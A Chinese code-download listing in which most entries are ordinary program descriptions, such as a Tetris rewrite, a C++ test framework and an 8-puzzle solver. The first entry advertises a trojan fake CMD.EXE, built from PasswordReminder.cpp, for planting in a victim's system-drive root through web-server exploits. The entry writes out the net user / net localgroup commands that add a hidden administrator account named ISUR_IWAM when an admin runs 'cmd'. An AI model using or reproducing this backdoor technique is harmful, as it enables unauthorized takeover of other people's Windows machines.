你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级
上传时间: 2015-01-12
上传用户:qlpqlq
硬盘参数读取程序,费话不多说啦
上传时间: 2014-08-29
上传用户:q123321
java中關於tree的寫法,不同于往常
上传时间: 2013-12-19
上传用户:xz85592677
改写MFC写的俄罗斯方块. 很不錯,可以研究一下
上传时间: 2013-12-27
上传用户:wl9454
這本書是一本非常不錯的書,讓大家一起來
标签: 家
上传时间: 2015-01-14
上传用户:1583060504
CxxTester是一个用于C++代码的通用测试框。它支持测试库系统、有一套方法的对象文件、甚至单行C++源(即所有用C++接口的东西)。解释程序的前端使你能够在不需要重新编译代码的情况下修改和扩大测试。测试可以通过脚本成批执行或者在图表输出的支持下交互式执行。该工具使不同主机间的远距离测试成为可能。
上传时间: 2015-01-14
上传用户:tianjinfan
一个JAVA小程序!功能不小!
上传时间: 2015-01-15
上传用户:xuan‘nian
八数码难题求解程序本程序所采用的启发函数,本人不能证明它能解决任何的八数码难题,如果对于较难的问题会产生很多节点,有可能会使空间不足,所以尽量不要出太难的问题难为它.希望广大的人工智能爱好者能写出更好的启发函数.
上传时间: 2015-01-15
上传用户:comua
一个很难的需求啊!反正我不会啊
标签: 正
上传时间: 2013-12-24
上传用户:坏天使kk
一个使用htmltaglib的代码,在网上或书籍上一般都看不到
标签: htmltaglib 代码 书籍
上传时间: 2013-12-12
上传用户:zhengzg
